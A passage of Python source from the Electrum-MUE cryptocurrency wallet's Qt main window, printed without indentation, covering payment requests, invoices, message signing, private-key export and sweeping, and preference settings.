# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid MonetaryUnit URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mue.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum-MUE, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid MonetaryUnit address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid MonetaryUnit address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_mue.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum-MUE was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_mue import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("monetaryunit:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum-MUE was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mue import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mue-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum-MUE was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_mue.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
